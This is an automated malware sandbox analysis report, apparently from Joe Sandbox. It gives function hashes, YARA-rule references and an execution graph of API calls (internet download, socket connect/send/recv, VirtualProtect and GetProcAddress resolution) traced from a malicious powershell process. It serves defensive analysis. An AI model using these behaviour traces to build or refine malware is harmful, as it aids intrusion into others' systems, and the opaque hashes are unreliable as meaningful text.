                                                                • Instruction ID: 4c0426647290fda1e9627994d5b1f3352b98a8e3d25ce3c8e46c6885c1d54783
                                                                • Opcode Fuzzy Hash: 662da16a955221b0633be1f8647f30d293f3d26f93fa74548034c400eb59321a
                                                                • Instruction Fuzzy Hash: 8D3193B0F04305DFE765CF18D990A76BBAAFF85618B18C59AE8498B252CF31DC42C790
                                                                Function 06FA28FB Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (o]q
                                                                • API String ID: 0-794736227
                                                                • Opcode ID: b276a7e526eeedd04d4a0f24ad078ac014c742b83262120db126ab8c809e124b
                                                                • Instruction ID: e6b4db0f4c128e5e0def77201d60aa4394c799cc701df8d58fbc3e2f4be68347
                                                                • Opcode Fuzzy Hash: b276a7e526eeedd04d4a0f24ad078ac014c742b83262120db126ab8c809e124b
                                                                • Instruction Fuzzy Hash: BE3180B0F04305DFEBB8CF58C944B6AB7B6BB48711F0C8165E4148B194C771D680CBA5
                                                                Function 06FA258F Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q
                                                                • API String ID: 0-1259897404
                                                                • Opcode ID: 6288e12bd591a36eab8457d76ce338632202d228d1978e948d65eb001e8e4277
                                                                • Instruction ID: 4550649c37b0ca1aebaa13504c8d681b7b3650ddd4476fe0e244daf897f51c3c
                                                                • Opcode Fuzzy Hash: 6288e12bd591a36eab8457d76ce338632202d228d1978e948d65eb001e8e4277
                                                                • Instruction Fuzzy Hash: C42180B1F02305CFDBA4DF69C554B6A77E6BF85250F1D8066D4088B351DB34DA81CB91
                                                                Function 06FA0E23 Relevance: .1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 09f467d213d92a482ea6fe67c9c69dd76fc24af2e9f19fb422b4f49a745faac7
                                                                • Instruction ID: f503668399719642e607f163757099281e894b2d627505426903a218aec82bed
                                                                • Opcode Fuzzy Hash: 09f467d213d92a482ea6fe67c9c69dd76fc24af2e9f19fb422b4f49a745faac7
                                                                • Instruction Fuzzy Hash: B401F1306483C42FD76623340D21B6E3EE6AF86B04F54808AF946DF2E7C8758E448376
                                                                Function 026DD005 Relevance: .0, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2233923742.00000000026DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026DD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_26dd000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 73055fc5084aa72274aa563a0d179beb677ef629536fccf89d80c722910160f6
                                                                • Instruction ID: 55fcd1cc54d247669ec32e1f3d9f90c52b1510c568372ee4fe8a8b84774790d2
                                                                • Opcode Fuzzy Hash: 73055fc5084aa72274aa563a0d179beb677ef629536fccf89d80c722910160f6
                                                                • Instruction Fuzzy Hash: A901807240D3C49FD7169B258C84752BFB8EF43224F4985DBE8888F293C2695C45C771
                                                                Function 026DD01D Relevance: .0, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2233923742.00000000026DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026DD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_26dd000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7b4eb4c99d8b0a4eba796c75d40f9079f6174184c808bd00450ad62a741fd222
                                                                • Instruction ID: d9a3433d7a1ca1cd17c28224e44cb51c7d0b20ccb8c2df5a91ff3acbec11cd01
                                                                • Opcode Fuzzy Hash: 7b4eb4c99d8b0a4eba796c75d40f9079f6174184c808bd00450ad62a741fd222
                                                                • Instruction Fuzzy Hash: EA012B32804388AEE720AE15CD84B67BF9CEFC5324F58C52AED480B346C3799842C6F1
                                                                Function 06FA0E40 Relevance: .0, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 156f1ccd2a1886676740c93ca643736098c4df7e4b912c976c60b8446678ab6d
                                                                • Instruction ID: 9429681fabd1ab5a58ffd52ff0d9c970335bbf822d2d343a65b387edcecfe069
                                                                • Opcode Fuzzy Hash: 156f1ccd2a1886676740c93ca643736098c4df7e4b912c976c60b8446678ab6d
                                                                • Instruction Fuzzy Hash: C2F02270B403487BDAA466394802B2E39DAAFC5B04F908008B6069F3C5DDB69D8083B6
                                                                Function 06FA0B10 Relevance: .0, Instructions: 40COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 519372a3ea2283ebf2c4ccbeed549ae98b214d7902e6a8115673e04f9f91a7fe
                                                                • Instruction ID: bc895b863c1db39fe27ee5465758cc958a9d475527f671c1bedbc2f19226daa1
                                                                • Opcode Fuzzy Hash: 519372a3ea2283ebf2c4ccbeed549ae98b214d7902e6a8115673e04f9f91a7fe
                                                                • Instruction Fuzzy Hash: 12F0AFA564E3C05FD7478734AD204A2BF765E8710831A86C7D085CF1A3C9128D4AC7A6

                                                                Non-executed Functions

                                                                Function 029FAC24 Relevance: 3.2, Strings: 2, Instructions: 733COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2235295706.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_29f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Xaq$$]q
                                                                • API String ID: 0-1280934391
                                                                • Opcode ID: 76225cb48fc4e7d1273dd44a892b01794e71c1e21ae017be4705aafe7ef3ea9b
                                                                • Instruction ID: 4739bd45ebc855e615cbafbc29a4bf32de49da75a6f6295cf928ad87b92a59de
                                                                • Opcode Fuzzy Hash: 76225cb48fc4e7d1273dd44a892b01794e71c1e21ae017be4705aafe7ef3ea9b
                                                                • Instruction Fuzzy Hash: 77D1D274B042558BCB889F78C8B06BE7BB7EF88714B14C969D546DB389DE3488028796
                                                                Function 06FA1AD0 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                • API String ID: 0-3723351465
                                                                • Opcode ID: 9ec7b7d592f3dfe9043b79445a8b5cc308d3d51761bf8d400a9688093150e26e
                                                                • Instruction ID: f2ddb8500575a99770bd72d3f3296a2679b3a704840e15260f22f5e022d82a30
                                                                • Opcode Fuzzy Hash: 9ec7b7d592f3dfe9043b79445a8b5cc308d3d51761bf8d400a9688093150e26e
                                                                • Instruction Fuzzy Hash: 40413772F003058FEB68CE6988506AAB7EAEFC4650F25853BC845CB341EB31C845C791
                                                                Function 06FA23D8 Relevance: 6.4, Strings: 5, Instructions: 121COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                • API String ID: 0-2353078639
                                                                • Opcode ID: c23c4f45d5bdf60becfb7978e4b7772023f6bfc59c41dd2edd54cd68838cfbfa
                                                                • Instruction ID: 78a6abe40f0ad1666fccbec5566a9bde37d41e70378928faa9b949d629ff9b91
                                                                • Opcode Fuzzy Hash: c23c4f45d5bdf60becfb7978e4b7772023f6bfc59c41dd2edd54cd68838cfbfa
                                                                • Instruction Fuzzy Hash: 7141F3B1F00309CFDBA88F6DD59066AB7EABF84610F18847AC809CB216DB31CA45C791
                                                                Function 06FA14E0 Relevance: 6.4, Strings: 5, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$$]q$$]q$$]q
                                                                • API String ID: 0-2353078639
                                                                • Opcode ID: 8bfa75ee579d01132a143f54ba35f5d1b421e19a58deb54683c61b1f031713d9
                                                                • Instruction ID: 190535f7637e9c2853ad1d57e7b33ba43627b2e52210e6ab37d3665c8fead30d
                                                                • Opcode Fuzzy Hash: 8bfa75ee579d01132a143f54ba35f5d1b421e19a58deb54683c61b1f031713d9
                                                                • Instruction Fuzzy Hash: F931C6B2F00309CFDB64CE6D945466ABBEAEF85610F25846AD8568B201DB31C855C7A1
                                                                Function 06FA1ACB Relevance: 5.1, Strings: 4, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $]q$$]q$$]q$$]q
                                                                • API String ID: 0-858218434
                                                                • Opcode ID: 40ed905d9293e5baba6bbd94ca3d279512c6088d4f6ef63b31a315ca0c4a2a70
                                                                • Instruction ID: 2262a0a0bbaeff95eb17c25eb2b4d374d44f624a8d61408eee7afd0cc1195286
                                                                • Opcode Fuzzy Hash: 40ed905d9293e5baba6bbd94ca3d279512c6088d4f6ef63b31a315ca0c4a2a70
                                                                • Instruction Fuzzy Hash: 3E21D1B6E003059FEBB4CE1889807AAB7F5AF84690F26426AC8558B341E7318480CB91
                                                                Function 06FA0083 Relevance: 5.0, Strings: 4, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.2281599779.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_6fa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4']q$4']q$$]q$$]q
                                                                • API String ID: 0-978391646
                                                                • Opcode ID: f143632c1a92ab5cc50cb18163d660ab312259022866aa5c3361d385e57ae233
                                                                • Instruction ID: 07da5e21699368337af479e158754938a4696fe5a92e344311803ee81355d95f
                                                                • Opcode Fuzzy Hash: f143632c1a92ab5cc50cb18163d660ab312259022866aa5c3361d385e57ae233
                                                                • Instruction Fuzzy Hash: A2F0F471B4C3840FC76A062928706392FF66F82958B6A95EBC4C1DF297CE654C45C397

                                                                Execution Graph

                                                                Execution Coverage:5.2%
                                                                Dynamic/Decrypted Code Coverage:3.7%
                                                                Signature Coverage:5.4%
                                                                Total number of Nodes:1897
                                                                Total number of Limit Nodes:77
                                                                execution_graph 53082 415d41 53097 41b411 53082->53097 53084 415d4a 53108 4020f6 53084->53108 53089 4170c4 53132 401e8d 53089->53132 53093 401fd8 11 API calls 53094 4170d9 53093->53094 53095 401fd8 11 API calls 53094->53095 53096 4170e5 53095->53096 53138 4020df 53097->53138 53102 41b456 InternetReadFile 53105 41b479 53102->53105 53104 41b4a6 InternetCloseHandle InternetCloseHandle 53106 41b4b8 53104->53106 53105->53102 53105->53104 53107 401fd8 11 API calls 53105->53107 53149 4020b7 53105->53149 53106->53084 53107->53105 53109 40210c 53108->53109 53110 4023ce 11 API calls 53109->53110 53111 402126 53110->53111 53112 402569 28 API calls 53111->53112 53113 402134 53112->53113 53114 404aa1 53113->53114 53115 404ab4 53114->53115 53216 40520c 53115->53216 53117 404ac9 ctype 53118 404b40 WaitForSingleObject 53117->53118 53119 404b20 53117->53119 53121 404b56 53118->53121 53120 404b32 send 53119->53120 53122 404b7b 53120->53122 53222 4210cb 54 API calls 53121->53222 53125 401fd8 11 API calls 53122->53125 53124 404b69 SetEvent 53124->53122 53126 404b83 53125->53126 53127 401fd8 11 API calls 53126->53127 53128 404b8b 53127->53128 53128->53089 53129 401fd8 53128->53129 53130 4023ce 11 API calls 53129->53130 53131 401fe1 53130->53131 53131->53089 53133 402163 53132->53133 53134 40219f 53133->53134 53240 402730 11 API calls 53133->53240 53134->53093 53136 402184 53241 402712 11 API calls std::_Deallocate 53136->53241 53139 4020e7 53138->53139 53155 4023ce 53139->53155 53141 4020f2 53142 43bda0 53141->53142 53147 4461b8 __Getctype 53142->53147 53143 4461f6 53171 44062d 20 API calls _abort 53143->53171 53144 4461e1 RtlAllocateHeap 53146 41b42f InternetOpenW InternetOpenUrlW 53144->53146 53144->53147 53146->53102 53147->53143 53147->53144 53170 443001 7 API calls 2 library calls 53147->53170 53150 4020bf 53149->53150 53151 4023ce 11 API calls 53150->53151 53152 4020ca 53151->53152 53172 40250a 53152->53172 53154 4020d9 53154->53105 53156 402428 53155->53156 53157 4023d8 53155->53157 53156->53141 53157->53156 53159 4027a7 53157->53159 53160 402e21 53159->53160 53163 4016b4 53160->53163 53162 402e30 53162->53156 53164 4016cb 53163->53164 53166 4016c6 53163->53166 53165 4016f3 53164->53165 53164->53166 53165->53162 53169 43bd68 11 API calls _abort 53166->53169 53168 43bd67 53169->53168 53170->53147 53171->53146 53173 40251a 53172->53173 53174 402520 53173->53174 53175 402535 53173->53175 53179 402569 53174->53179 53189 4028e8 53175->53189 53178 402533 53178->53154 53200 402888 53179->53200 53181 40257d 53182 402592 53181->53182 53183 4025a7 53181->53183 53205 402a34 22 API calls 53182->53205 53185 4028e8 28 API calls 53183->53185 53188 4025a5 53185->53188 53186 40259b 53206 4029da 22 API calls 53186->53206 53188->53178 53190 4028f1 53189->53190 53191 402953 53190->53191 53192 4028fb 53190->53192 53214 4028a4 22 API calls 53191->53214 53195 402904 53192->53195 53196 402917 53192->53196 53208 402cae 53195->53208 53198 402915 53196->53198 53199 4023ce 11 API calls 53196->53199 53198->53178 53199->53198 53201 402890 53200->53201 53202 402898 53201->53202 53207 402ca3 22 API calls 53201->53207 53202->53181 53205->53186 53206->53188 53209 402cb8 __EH_prolog 53208->53209 53215 402e54 22 API calls 53209->53215 53211 4023ce 11 API calls 53213 402d92 53211->53213 53212 402d24 53212->53211 53213->53198 53215->53212 53217 405214 53216->53217 53218 4023ce 11 API calls 53217->53218 53219 40521f 53218->53219 53223 405234 53219->53223 53221 40522e 53221->53117 53222->53124 53224 405240 53223->53224 53225 40526e 53223->53225 53226 4028e8 28 API calls 53224->53226 53239 4028a4 22 API calls 53225->53239 53228 40524a 53226->53228 53228->53221 53240->53136 53241->53134 53242 426a77 53243 426a8c 53242->53243 53252 426b1e 53242->53252 53244 426b83 53243->53244 53246 426ad9 53243->53246 53247 426b0e 53243->53247 53248 426bd5 53243->53248 53243->53252 53253 426b4e 53243->53253 53256 426bae 53243->53256 53270 424f6e 49 API calls ctype 53243->53270 53244->53256 53274 425781 21 API calls 53244->53274 53246->53247 53246->53252 53271 41fbfd 52 API calls 53246->53271 53247->53252 53247->53253 53272 424f6e 49 API calls ctype 53247->53272 53248->53252 53275 4261e6 28 API calls 53248->53275 53253->53244 53253->53252 53273 41fbfd 52 API calls 53253->53273 53256->53248 53256->53252 53258 425b72 53256->53258 53260 425b91 ___scrt_get_show_window_mode 53258->53260 53259 425ba5 53265 425bc5 53259->53265 53266 425bae 53259->53266 53283 41daf0 49 API calls 53259->53283 53262 425ba0 53260->53262 53260->53265 53276 41ec4c 21 API calls 53260->53276 53262->53259 53262->53265 53277 420669 46 API calls 53262->53277 53265->53248 53266->53265 53284 424d96 21 API calls 2 library calls 53266->53284 53268 425c48 53268->53265 53278 432f55 53268->53278 53270->53246 53271->53246 53272->53253 53273->53253 53274->53256 53275->53252 53276->53262 53277->53268 53279 432f63 53278->53279 53280 432f5f 53278->53280 53281 43bda0 _Yarn 21 API calls 53279->53281 53280->53259 53282 432f68 53281->53282 53282->53259 53283->53266 53284->53265 53285 1000c7a7 53286 1000c7be 53285->53286 53291 1000c82c 53285->53291 53286->53291 53297 1000c7e6 GetModuleHandleA 53286->53297 53287 1000c835 GetModuleHandleA 53289 1000c83f 53287->53289 53289->53289 53289->53291 53292 1000c85f GetProcAddress 53289->53292 53290 1000c872 53291->53287 53291->53289 53291->53290 53292->53291 53293 1000c7dd 53293->53289 53293->53291 53294 1000c800 GetProcAddress 53293->53294 53294->53291 53295 1000c80d VirtualProtect 53294->53295 53295->53291 53296 1000c81c VirtualProtect 53295->53296 53296->53291 53298 1000c7ef 53297->53298 53304 1000c82c 53297->53304 53309 1000c803 GetProcAddress 53298->53309 53300 1000c872 53301 1000c835 GetModuleHandleA 53306 1000c83f 53301->53306 53302 1000c7f4 53303 1000c800 GetProcAddress 53302->53303 53302->53304 53303->53304 53305 1000c80d VirtualProtect 53303->53305 53304->53300 53304->53301 53304->53306 53305->53304 53307 1000c81c VirtualProtect 53305->53307 53306->53304 53308 1000c85f GetProcAddress 53306->53308 53307->53304 53308->53304 53310 1000c82c 53309->53310 53311 1000c80d VirtualProtect 53309->53311 53313 1000c872 53310->53313 53314 1000c835 GetModuleHandleA 53310->53314 53311->53310 53312 1000c81c VirtualProtect 53311->53312 53312->53310 53316 1000c83f 53314->53316 53315 1000c85f GetProcAddress 53315->53316 53316->53310 53316->53315 53317 4437fd 53318 443806 53317->53318 53323 44381f 53317->53323 53319 44380e 53318->53319 53324 443885 53318->53324 53321 443816 53321->53319 53335 443b52 22 API calls 2 library calls 53321->53335 53325 443891 53324->53325 53326 44388e 53324->53326 53336 44f45d GetEnvironmentStringsW 53325->53336 53326->53321 53329 44389e 53331 446802 _free 20 API calls 53329->53331 53332 4438d3 53331->53332 53332->53321 53333 4438a9 53344 446802 53333->53344 53335->53323 53337 44f471 53336->53337 53338 443898 53336->53338 53350 4461b8 53337->53350 53338->53329 53343 4439aa 26 API calls 3 library calls 53338->53343 53340 44f485 ctype 53341 446802 _free 20 API calls 53340->53341 53342 44f49f FreeEnvironmentStringsW 53341->53342 53342->53338 53343->53333 53345 44680d RtlFreeHeap 53344->53345 53349 446836 _free 53344->53349 53346 446822 53345->53346 53345->53349 53359 44062d 20 API calls _abort 53346->53359 53348 446828 GetLastError 53348->53349 53349->53329 53351 4461f6 53350->53351 53352 4461c6 __Getctype 53350->53352 53358 44062d 20 API calls _abort 53351->53358 53352->53351 53353 4461e1 RtlAllocateHeap 53352->53353 53357 443001 7 API calls 2 library calls 53352->53357 53353->53352 53355 4461f4 53353->53355 53355->53340 53357->53352 53358->53355 53359->53348 53360 42dd08 53362 42dd2e ___scrt_get_show_window_mode 53360->53362 53361 42ddc5 53362->53361 53368 42c308 53362->53368 53364 42dd92 53364->53361 53381 42dae7 53364->53381 53366 42ddaf 53366->53361 53388 42db59 49 API calls ___scrt_get_show_window_mode 53366->53388 53369 42c3d3 53368->53369 53370 42c315 53368->53370 53369->53364 53370->53369 53371 42c350 53370->53371 53389 42c2c6 45 API calls 53370->53389 53372 42c36a 53371->53372 53390 42c2c6 45 API calls 53371->53390 53375 42c384 53372->53375 53391 42c2c6 45 API calls 53372->53391 53377 42c39e 53375->53377 53392 42c2c6 45 API calls 53375->53392 53380 42c3b8 53377->53380 53393 42c2c6 45 API calls 53377->53393 53380->53364 53394 4335e7 53381->53394 53383 42dafb 53385 42db31 53383->53385 53398 42fc52 53383->53398 53385->53366 53386 42db10 53386->53385 53404 4307a2 53386->53404 53388->53361 53389->53371 53390->53372 53391->53375 53392->53377 53393->53380 53395 4335fc 53394->53395 53397 433617 53394->53397 53395->53397 53411 4338c8 CryptAcquireContextA 53395->53411 53397->53383 53399 42fc60 53398->53399 53400 42fc65 53398->53400 53415 42f97e 53399->53415 53403 42fc97 53400->53403 53419 42fca2 22 API calls 53400->53419 53403->53386 53439 431c95 21 API calls 53404->53439 53406 4307b9 53410 4307d5 53406->53410 53440 43081c 22 API calls 53406->53440 53408 4307cd 53408->53410 53441 430abf 22 API calls 53408->53441 53410->53385 53412 4338e4 53411->53412 53413 4338e9 CryptGenRandom 53411->53413 53412->53397 53413->53412 53414 4338fe CryptReleaseContext 53413->53414 53414->53412 53416 42f989 53415->53416 53418 42f99d 53416->53418 53420 432f7f 53416->53420 53418->53400 53419->53400 53421 432f8a 53420->53421 53422 432f8e 53420->53422 53421->53418 53424 440f5d 53422->53424 53425 446206 53424->53425 53426 446213 53425->53426 53427 44621e 53425->53427 53428 4461b8 ___crtLCMapStringA 21 API calls 53426->53428 53429 446226 53427->53429 53435 44622f __Getctype 53427->53435 53433 44621b 53428->53433 53430 446802 _free 20 API calls 53429->53430 53430->53433 53431 446234 53437 44062d 20 API calls _abort 53431->53437 53432 446259 RtlReAllocateHeap 53432->53433 53432->53435 53433->53421 53435->53431 53435->53432 53438 443001 7 API calls 2 library calls 53435->53438 53437->53433 53438->53435 53439->53406 53440->53408 53441->53410 53442 4165db 53453 401e65 53442->53453 53444 4165eb 53445 4020f6 28 API calls 53444->53445 53446 4165f6 53445->53446 53447 401e65 22 API calls 53446->53447 53448 416601 53447->53448 53449 4020f6 28 API calls 53448->53449 53450 41660c 53449->53450 53458 412965 53450->53458 53454 401e6d 53453->53454 53455 401e75 53454->53455 53477 402158 22 API calls 53454->53477 53455->53444 53478 40482d 53458->53478 53460 412979 53485 4048c8 connect 53460->53485 53464 41299a 53550 402f10 53464->53550 53467 404aa1 61 API calls 53468 4129ae 53467->53468 53469 401fd8 11 API calls 53468->53469 53470 4129b6 53469->53470 53555 404c10 53470->53555 53473 401fd8 11 API calls 53474 4129cc 53473->53474 53475 401fd8 11 API calls 53474->53475 53476 4129d4 53475->53476 53479 404846 socket 53478->53479 53480 404839 53478->53480 53482 404860 CreateEventW 53479->53482 53483 404842 53479->53483 53573 40489e WSAStartup 53480->53573 53482->53460 53483->53460 53484 40483e 53484->53479 53484->53483 53486 404a1b 53485->53486 53487 4048ee 53485->53487 53488 40497e 53486->53488 53489 404a21 WSAGetLastError 53486->53489 53487->53488 53508 404923 53487->53508 53574 40531e 53487->53574 53545 402f31 53488->53545 53489->53488 53490 404a31 53489->53490 53493 404932 53490->53493 53494 404a36 53490->53494 53500 402093 28 API calls 53493->53500 53614 41cb72 30 API calls 53494->53614 53496 40492b 53496->53493 53499 404941 53496->53499 53497 40490f 53579 402093 53497->53579 53498 404a40 53615 4052fd 28 API calls 53498->53615 53510 404950 53499->53510 53511 404987 53499->53511 53504 404a80 53500->53504 53507 402093 28 API calls 53504->53507 53512 404a8f 53507->53512 53609 420cf1 27 API calls 53508->53609 53516 402093 28 API calls 53510->53516 53611 421ad1 54 API calls 53511->53611 53513 41b580 80 API calls 53512->53513 53513->53488 53519 40495f 53516->53519 53518 40498f 53521 4049c4 53518->53521 53522 404994 53518->53522 53523 402093 28 API calls 53519->53523 53613 420e97 28 API calls 53521->53613 53526 402093 28 API calls 53522->53526 53527 40496e 53523->53527 53529 4049a3 53526->53529 53530 41b580 80 API calls 53527->53530 53528 4049cc 53532 4049f9 CreateEventW CreateEventW 53528->53532 53534 402093 28 API calls 53528->53534 53533 402093 28 API calls 53529->53533 53531 404973 53530->53531 53610 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53531->53610 53532->53488 53535 4049b2 53533->53535 53537 4049e2 53534->53537 53538 41b580 80 API calls 53535->53538 53539 402093 28 API calls 53537->53539 53540 4049b7 53538->53540 53541 4049f1 53539->53541 53612 421143 52 API calls 53540->53612 53543 41b580 80 API calls 53541->53543 53544 4049f6 53543->53544 53544->53532 53546 4020df 11 API calls 53545->53546 53547 402f3d 53546->53547 53548 4032a0 28 API calls 53547->53548 53549 402f59 53548->53549 53549->53464 53666 401fb0 53550->53666 53552 402f1e 53553 402055 11 API calls 53552->53553 53554 402f2d 53553->53554 53554->53467 53556 4020df 11 API calls 53555->53556 53557 404c27 53556->53557 53558 4020df 11 API calls 53557->53558 53560 404c30 53558->53560 53559 43bda0 _Yarn 21 API calls 53559->53560 53560->53559 53562 4020b7 28 API calls 53560->53562 53563 404ca1 53560->53563 53567 401fd8 11 API calls 53560->53567 53669 404b96 53560->53669 53675 401fe2 53560->53675 53684 404cc3 53560->53684 53562->53560 53697 404e26 WaitForSingleObject 53563->53697 53567->53560 53568 401fd8 11 API calls 53569 404cb1 53568->53569 53570 401fd8 11 API calls 53569->53570 53571 404cba 53570->53571 53571->53473 53573->53484 53575 4020df 11 API calls 53574->53575 53576 40532a 53575->53576 53616 4032a0 53576->53616 53578 405346 53578->53497 53580 40209b 53579->53580 53581 4023ce 11 API calls 53580->53581 53582 4020a6 53581->53582 53620 4024ed 53582->53620 53585 41b580 53586 41b631 53585->53586 53587 41b596 GetLocalTime 53585->53587 53589 401fd8 11 API calls 53586->53589 53588 40531e 28 API calls 53587->53588 53590 41b5d8 53588->53590 53591 41b639 53589->53591 53624 406383 53590->53624 53593 401fd8 11 API calls 53591->53593 53595 41b641 53593->53595 53595->53508 53596 402f10 28 API calls 53597 41b5f0 53596->53597 53598 406383 28 API calls 53597->53598 53599 41b5fc 53598->53599 53629 40723b 77 API calls 53599->53629 53601 41b60a 53602 401fd8 11 API calls 53601->53602 53603 41b616 53602->53603 53604 401fd8 11 API calls 53603->53604 53605 41b61f 53604->53605 53606 401fd8 11 API calls 53605->53606 53607 41b628 53606->53607 53608 401fd8 11 API calls 53607->53608 53608->53586 53609->53496 53610->53488 53611->53518 53612->53531 53613->53528 53614->53498 53617 4032aa 53616->53617 53618 4028e8 28 API calls 53617->53618 53619 4032c9 53617->53619 53618->53619 53619->53578 53621 4024f9 53620->53621 53622 40250a 28 API calls 53621->53622 53623 4020b1 53622->53623 53623->53585 53630 4051ef 53624->53630 53626 406391 53634 402055 53626->53634 53629->53601 53631 4051fb 53630->53631 53640 405274 53631->53640 53633 405208 53633->53626 53635 402061 53634->53635 53636 4023ce 11 API calls 53635->53636 53637 40207b 53636->53637 53662 40267a 53637->53662 53641 405282 53640->53641 53642 40529e 53641->53642 53643 405288 53641->53643 53644 4052f5 53642->53644 53645 4052b6 53642->53645 53651 4025f0 53643->53651 53660 4028a4 22 API calls 53644->53660 53649 4028e8 28 API calls 53645->53649 53650 40529c 53645->53650 53649->53650 53650->53633 53652 402888 22 API calls 53651->53652 53653 402602 53652->53653 53654 402672 53653->53654 53655 402629 53653->53655 53661 4028a4 22 API calls 53654->53661 53657 4028e8 28 API calls 53655->53657 53659 40263b 53655->53659 53657->53659 53659->53650 53663 40268b 53662->53663 53664 4023ce 11 API calls 53663->53664 53665 40208d 53664->53665 53665->53596 53667 4025f0 28 API calls 53666->53667 53668 401fbd 53667->53668 53668->53552 53670 404ba0 WaitForSingleObject 53669->53670 53671 404bcd recv 53669->53671 53710 421107 54 API calls 53670->53710 53673 404be0 53671->53673 53673->53560 53674 404bbc SetEvent 53674->53673 53676 401ff1 53675->53676 53677 402039 53675->53677 53678 4023ce 11 API calls 53676->53678 53677->53560 53679 401ffa 53678->53679 53680 40203c 53679->53680 53682 402015 53679->53682 53681 40267a 11 API calls 53680->53681 53681->53677 53711 403098 28 API calls 53682->53711 53685 4020df 11 API calls 53684->53685 53690 404cde 53685->53690 53686 404e13 53687 401fd8 11 API calls 53686->53687 53688 404e1c 53687->53688 53688->53560 53689 401fd8 11 API calls 53689->53690 53690->53686 53690->53689 53691 4020f6 28 API calls 53690->53691 53694 4041a2 28 API calls 53690->53694 53695 401fe2 28 API calls 53690->53695 53712 4129da 53690->53712 53756 401fc0 53690->53756 53691->53690 53694->53690 53695->53690 